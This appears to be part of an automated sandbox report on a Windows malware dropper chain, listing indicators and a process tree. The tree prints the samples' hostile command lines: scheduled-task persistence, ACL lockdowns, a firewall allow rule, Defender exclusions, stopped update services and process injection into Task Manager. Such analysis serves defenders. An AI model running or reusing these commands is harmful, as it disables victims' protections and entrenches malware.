MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 5060 AppLaunch.exe Token: SeShutdownPrivilege 3248 Explorer.EXE Token: SeCreatePagefilePrivilege 3248 Explorer.EXE Token: SeShutdownPrivilege 3248 Explorer.EXE Token: SeCreatePagefilePrivilege 3248 Explorer.EXE Token: SeShutdownPrivilege 3248 Explorer.EXE Token: SeCreatePagefilePrivilege 3248 Explorer.EXE Token: SeShutdownPrivilege 3248 Explorer.EXE Token: SeCreatePagefilePrivilege 3248 Explorer.EXE Token: SeShutdownPrivilege 3248 Explorer.EXE Token: SeCreatePagefilePrivilege 3248 Explorer.EXE Token: SeDebugPrivilege 196 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 196 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 196 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 196 MicrosoftEdgeCP.exe Token: SeShutdownPrivilege 3248 Explorer.EXE Token: SeCreatePagefilePrivilege 3248 Explorer.EXE Token: SeShutdownPrivilege 3248 Explorer.EXE Token: SeCreatePagefilePrivilege 3248 Explorer.EXE Token: SeShutdownPrivilege 3248 Explorer.EXE Token: SeCreatePagefilePrivilege 3248 Explorer.EXE Token: SeShutdownPrivilege 3248 Explorer.EXE Token: SeCreatePagefilePrivilege 3248 Explorer.EXE Token: SeShutdownPrivilege 3248 Explorer.EXE Token: SeCreatePagefilePrivilege 3248 Explorer.EXE Token: SeShutdownPrivilege 3248 Explorer.EXE Token: SeCreatePagefilePrivilege 3248 Explorer.EXE Token: SeShutdownPrivilege 3248 Explorer.EXE Token: SeCreatePagefilePrivilege 3248 Explorer.EXE Token: SeShutdownPrivilege 3248 Explorer.EXE Token: SeCreatePagefilePrivilege 3248 Explorer.EXE Token: SeShutdownPrivilege 3248 Explorer.EXE Token: SeCreatePagefilePrivilege 3248 Explorer.EXE Token: SeShutdownPrivilege 3248 Explorer.EXE Token: SeCreatePagefilePrivilege 3248 Explorer.EXE Token: SeShutdownPrivilege 3248 Explorer.EXE Token: SeCreatePagefilePrivilege 3248 Explorer.EXE Token: SeShutdownPrivilege 3248 Explorer.EXE Token: SeCreatePagefilePrivilege 3248 Explorer.EXE Token: SeShutdownPrivilege 3248 Explorer.EXE Token: SeCreatePagefilePrivilege 3248 Explorer.EXE Token: SeShutdownPrivilege 3248 Explorer.EXE Token: SeCreatePagefilePrivilege 3248 Explorer.EXE Token: SeShutdownPrivilege 3248 Explorer.EXE Token: SeCreatePagefilePrivilege 3248 Explorer.EXE Token: SeShutdownPrivilege 3248 Explorer.EXE Token: SeCreatePagefilePrivilege 3248 Explorer.EXE Token: SeShutdownPrivilege 3248 Explorer.EXE Token: SeCreatePagefilePrivilege 3248 Explorer.EXE Token: SeShutdownPrivilege 3248 Explorer.EXE Token: SeCreatePagefilePrivilege 3248 Explorer.EXE Token: SeShutdownPrivilege 3248 Explorer.EXE Token: SeCreatePagefilePrivilege 3248 Explorer.EXE Token: SeShutdownPrivilege 3248 Explorer.EXE Token: SeCreatePagefilePrivilege 3248 Explorer.EXE Token: SeShutdownPrivilege 3248 Explorer.EXE Token: SeCreatePagefilePrivilege 3248 Explorer.EXE Token: SeShutdownPrivilege 3248 Explorer.EXE Token: SeCreatePagefilePrivilege 3248 Explorer.EXE Token: SeShutdownPrivilege 3248 Explorer.EXE Token: SeCreatePagefilePrivilege 3248 Explorer.EXE Token: SeShutdownPrivilege 3248 Explorer.EXE Token: SeCreatePagefilePrivilege 3248 Explorer.EXE Token: SeShutdownPrivilege 3248 Explorer.EXE -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 816 LzmwAqmV.tmp -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 3692 MicrosoftEdge.exe 2860 MicrosoftEdgeCP.exe 196 MicrosoftEdgeCP.exe 2860 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1056 wrote to memory of 3716 1056 4451d55722b6f39eb0c95e1309d8fc6258c6d57a8cc80f22c541d369da7ae3ad.exe 71 PID 1056 wrote to memory of 3716 1056 4451d55722b6f39eb0c95e1309d8fc6258c6d57a8cc80f22c541d369da7ae3ad.exe 71 PID 1056 wrote to memory of 3716 1056 4451d55722b6f39eb0c95e1309d8fc6258c6d57a8cc80f22c541d369da7ae3ad.exe 71 PID 3716 wrote to memory of 3816 3716 VT7qe04.exe 72 PID 3716 wrote to memory of 3816 3716 VT7qe04.exe 72 PID 3716 wrote to memory of 3816 3716 VT7qe04.exe 72 PID 3816 wrote to memory of 4488 3816 Qi3AC90.exe 73 PID 3816 wrote to memory of 4488 3816 Qi3AC90.exe 73 PID 3816 wrote to memory of 4488 3816 Qi3AC90.exe 73 PID 4488 wrote to memory of 3136 4488 Qd0cO64.exe 74 PID 4488 wrote to memory of 3136 4488 Qd0cO64.exe 74 PID 4488 wrote to memory of 3136 4488 Qd0cO64.exe 74 PID 3136 wrote to memory of 4336 3136 mx7GR09.exe 75 PID 3136 wrote to memory of 4336 3136 mx7GR09.exe 75 PID 3136 wrote to memory of 4336 3136 mx7GR09.exe 75 PID 4336 wrote to memory of 5056 4336 xT7bQ21.exe 76 PID 4336 wrote to memory of 5056 4336 xT7bQ21.exe 76 PID 4336 wrote to memory of 5056 4336 xT7bQ21.exe 76 PID 5056 wrote to memory of 5060 5056 1GI28ZB6.exe 77 PID 5056 wrote to memory of 5060 5056 1GI28ZB6.exe 77 PID 5056 wrote to memory of 5060 5056 1GI28ZB6.exe 77 PID 5056 wrote to memory of 5060 5056 1GI28ZB6.exe 77 PID 5056 wrote to memory of 5060 5056 1GI28ZB6.exe 77 PID 5056 wrote to memory of 5060 5056 1GI28ZB6.exe 77 PID 5056 wrote to memory of 5060 5056 1GI28ZB6.exe 77 PID 5056 wrote to memory of 5060 5056 1GI28ZB6.exe 77 PID 4336 wrote to memory of 3304 4336 xT7bQ21.exe 78 PID 4336 wrote to memory of 3304 4336 xT7bQ21.exe 78 PID 4336 wrote to memory of 3304 4336 xT7bQ21.exe 78 PID 3304 wrote to memory of 1256 3304 2Wo8986.exe 79 PID 3304 wrote to memory of 1256 3304 2Wo8986.exe 79 PID 3304 wrote to memory of 1256 3304 2Wo8986.exe 79 PID 3304 wrote to memory of 1256 3304 2Wo8986.exe 79 PID 3304 wrote to memory of 1256 3304 2Wo8986.exe 79 PID 3304 wrote to memory of 1256 3304 2Wo8986.exe 79 PID 3304 wrote to memory of 1256 3304 2Wo8986.exe 79 PID 3304 wrote to memory of 1256 3304 2Wo8986.exe 79 PID 3304 wrote to memory of 1256 3304 2Wo8986.exe 79 PID 3304 wrote to memory of 1256 3304 2Wo8986.exe 79 PID 3136 wrote to memory of 4920 3136 mx7GR09.exe 80 PID 3136 wrote to memory of 4920 3136 mx7GR09.exe 80 PID 3136 wrote to memory of 4920 3136 mx7GR09.exe 80 PID 4488 wrote to memory of 4968 4488 Qd0cO64.exe 83 PID 4488 wrote to memory of 4968 4488 Qd0cO64.exe 83 PID 4488 wrote to memory of 4968 4488 Qd0cO64.exe 83 PID 4968 wrote to memory of 4596 4968 4vP982qy.exe 84 PID 4968 wrote to memory of 4596 4968 4vP982qy.exe 84 PID 4968 wrote to memory of 4596 4968 4vP982qy.exe 84 PID 4968 wrote to memory of 4596 4968 4vP982qy.exe 84 PID 4968 wrote to memory of 4596 4968 4vP982qy.exe 84 PID 4968 wrote to memory of 4596 4968 4vP982qy.exe 84 PID 4968 wrote to memory of 4596 4968 4vP982qy.exe 84 PID 4968 wrote to memory of 4596 4968 4vP982qy.exe 84 PID 3816 wrote to memory of 4868 3816 Qi3AC90.exe 85 PID 3816 wrote to memory of 4868 3816 Qi3AC90.exe 85 PID 3816 wrote to memory of 4868 3816 Qi3AC90.exe 85 PID 4868 wrote to memory of 4360 4868 5bx1bm9.exe 86 PID 4868 wrote to memory of 4360 4868 5bx1bm9.exe 86 PID 4868 wrote to memory of 4360 4868 5bx1bm9.exe 86 PID 3716 wrote to memory of 4880 3716 VT7qe04.exe 87 PID 3716 wrote to memory of 4880 3716 VT7qe04.exe 87 PID 3716 wrote to memory of 4880 3716 VT7qe04.exe 87 PID 4360 wrote to memory of 2632 4360 explothe.exe 88 PID 4360 wrote to memory of 2632 4360 explothe.exe 88 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 D2E6.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 D2E6.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:3248 -
C:\Users\Admin\AppData\Local\Temp\4451d55722b6f39eb0c95e1309d8fc6258c6d57a8cc80f22c541d369da7ae3ad.exe"C:\Users\Admin\AppData\Local\Temp\4451d55722b6f39eb0c95e1309d8fc6258c6d57a8cc80f22c541d369da7ae3ad.exe"2⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1056 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VT7qe04.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VT7qe04.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3716 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Qi3AC90.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Qi3AC90.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3816 -
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Qd0cO64.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Qd0cO64.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4488 -
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mx7GR09.exeC:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mx7GR09.exe6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3136 -
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\xT7bQ21.exeC:\Users\Admin\AppData\Local\Temp\IXP004.TMP\xT7bQ21.exe7⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4336 -
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1GI28ZB6.exeC:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1GI28ZB6.exe8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:5056 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"9⤵
- Modifies Windows Defender Real-time Protection settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5060
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Wo8986.exeC:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Wo8986.exe8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3304 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"9⤵PID:1256
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1256 -s 56810⤵
- Program crash
PID:4084
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Ut91WN.exeC:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Ut91WN.exe7⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4920
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4vP982qy.exeC:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4vP982qy.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4968 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"7⤵PID:4596
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5bx1bm9.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5bx1bm9.exe5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4868 -
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4360 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F7⤵
- Creates scheduled task(s)
PID:2632
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit7⤵PID:820
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"8⤵PID:1880
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "explothe.exe" /P "Admin:N"8⤵PID:2268
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "explothe.exe" /P "Admin:R" /E8⤵PID:1672
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"8⤵PID:1844
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\fefffe8cea" /P "Admin:N"8⤵PID:1644
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\fefffe8cea" /P "Admin:R" /E8⤵PID:4628
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main7⤵
- Loads dropped DLL
PID:5224
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Rl4He7.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6Rl4He7.exe4⤵
- Executes dropped EXE
PID:4880
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7VP5BY20.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7VP5BY20.exe3⤵
- Executes dropped EXE
PID:3452 -
C:\Windows\System32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B054.tmp\B055.tmp\B056.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7VP5BY20.exe"4⤵PID:68
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\30B0.exeC:\Users\Admin\AppData\Local\Temp\30B0.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:6684 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\In4Ef7vw.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\In4Ef7vw.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:6124 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pt6Nm6IV.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\pt6Nm6IV.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:6196 -
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\XH4er0Kd.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\XH4er0Kd.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5448 -
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\gS0dO2rt.exeC:\Users\Admin\AppData\Local\Temp\IXP004.TMP\gS0dO2rt.exe6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:6960 -
C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1pv51qA8.exeC:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1pv51qA8.exe7⤵PID:6992
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"8⤵PID:1008
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1008 -s 5689⤵
- Program crash
PID:6396
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\2lQ988wn.exeC:\Users\Admin\AppData\Local\Temp\IXP006.TMP\2lQ988wn.exe7⤵
- Checks computer location settings
- Executes dropped EXE
PID:68
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3610.exeC:\Users\Admin\AppData\Local\Temp\3610.exe2⤵
- Executes dropped EXE
PID:7068
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3B60.bat" "2⤵
- Checks computer location settings
PID:4440
-
-
C:\Users\Admin\AppData\Local\Temp\43BE.exeC:\Users\Admin\AppData\Local\Temp\43BE.exe2⤵
- Executes dropped EXE
PID:3608
-
-
C:\Users\Admin\AppData\Local\Temp\45F1.exeC:\Users\Admin\AppData\Local\Temp\45F1.exe2⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
PID:6596
-
-
C:\Users\Admin\AppData\Local\Temp\475A.exeC:\Users\Admin\AppData\Local\Temp\475A.exe2⤵
- Executes dropped EXE
PID:5432
-
-
C:\Users\Admin\AppData\Local\Temp\4AE5.exeC:\Users\Admin\AppData\Local\Temp\4AE5.exe2⤵
- Executes dropped EXE
PID:1308
-
-
C:\Users\Admin\AppData\Local\Temp\706F.exeC:\Users\Admin\AppData\Local\Temp\706F.exe2⤵PID:4060
-
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6856 -
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:6408
-
-
-
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"3⤵
- Executes dropped EXE
PID:6376 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵PID:6896
-
-
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"4⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:8056 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:6496
-
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:5640
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
PID:5376
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:6712
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:7564
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
PID:7360 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:7804
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
PID:7384
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f6⤵PID:6956
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:7888
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1100
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll6⤵
- Executes dropped EXE
PID:4332
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
PID:6164
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"6⤵
- Executes dropped EXE
PID:3724 -
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵PID:8108
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵
- Launches sc.exe
PID:7532
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exeC:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe6⤵
- Executes dropped EXE
PID:6588 -
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn "csrss" /f7⤵PID:8072
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn "ScheduledUpdate" /f7⤵PID:7380
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\kos4.exe"C:\Users\Admin\AppData\Local\Temp\kos4.exe"3⤵
- Executes dropped EXE
PID:2540 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"4⤵
- Executes dropped EXE
PID:3108 -
C:\Users\Admin\AppData\Local\Temp\is-7D60C.tmp\LzmwAqmV.tmp"C:\Users\Admin\AppData\Local\Temp\is-7D60C.tmp\LzmwAqmV.tmp" /SL5="$B007C,2772724,54272,C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:816 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Delete /F /TN "EAC1029-3"6⤵PID:4520
-
-
C:\Program Files (x86)\EAudioConverter\EAudioConverter.exe"C:\Program Files (x86)\EAudioConverter\EAudioConverter.exe" -i6⤵PID:5140
-
-
C:\Program Files (x86)\EAudioConverter\EAudioConverter.exe"C:\Program Files (x86)\EAudioConverter\EAudioConverter.exe" -s6⤵
- Executes dropped EXE
PID:6800
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\latestX.exe"C:\Users\Admin\AppData\Local\Temp\latestX.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
PID:3004
-
-
-
C:\Users\Admin\AppData\Local\Temp\72F1.exeC:\Users\Admin\AppData\Local\Temp\72F1.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:6724
-
-
C:\Users\Admin\AppData\Local\Temp\85CE.exeC:\Users\Admin\AppData\Local\Temp\85CE.exe2⤵PID:7048
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:7328
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7328 -s 5844⤵
- Program crash
PID:7540
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\CDB5.exeC:\Users\Admin\AppData\Local\Temp\CDB5.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:8060 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe3⤵PID:4464
-
-
-
C:\Users\Admin\AppData\Local\Temp\D2E6.exeC:\Users\Admin\AppData\Local\Temp\D2E6.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
PID:7416
-
-
C:\Users\Admin\AppData\Local\Temp\D364.exeC:\Users\Admin\AppData\Local\Temp\D364.exe2⤵
- Executes dropped EXE
PID:7460
-
-
C:\Users\Admin\AppData\Local\Temp\D411.exeC:\Users\Admin\AppData\Local\Temp\D411.exe2⤵
- Executes dropped EXE
PID:7784
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵PID:4604
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:5796
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:6564
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:192
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:7980
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:7884
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:5468
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:7484
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:7272
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:6156
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:7532
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:7412
-
-
-
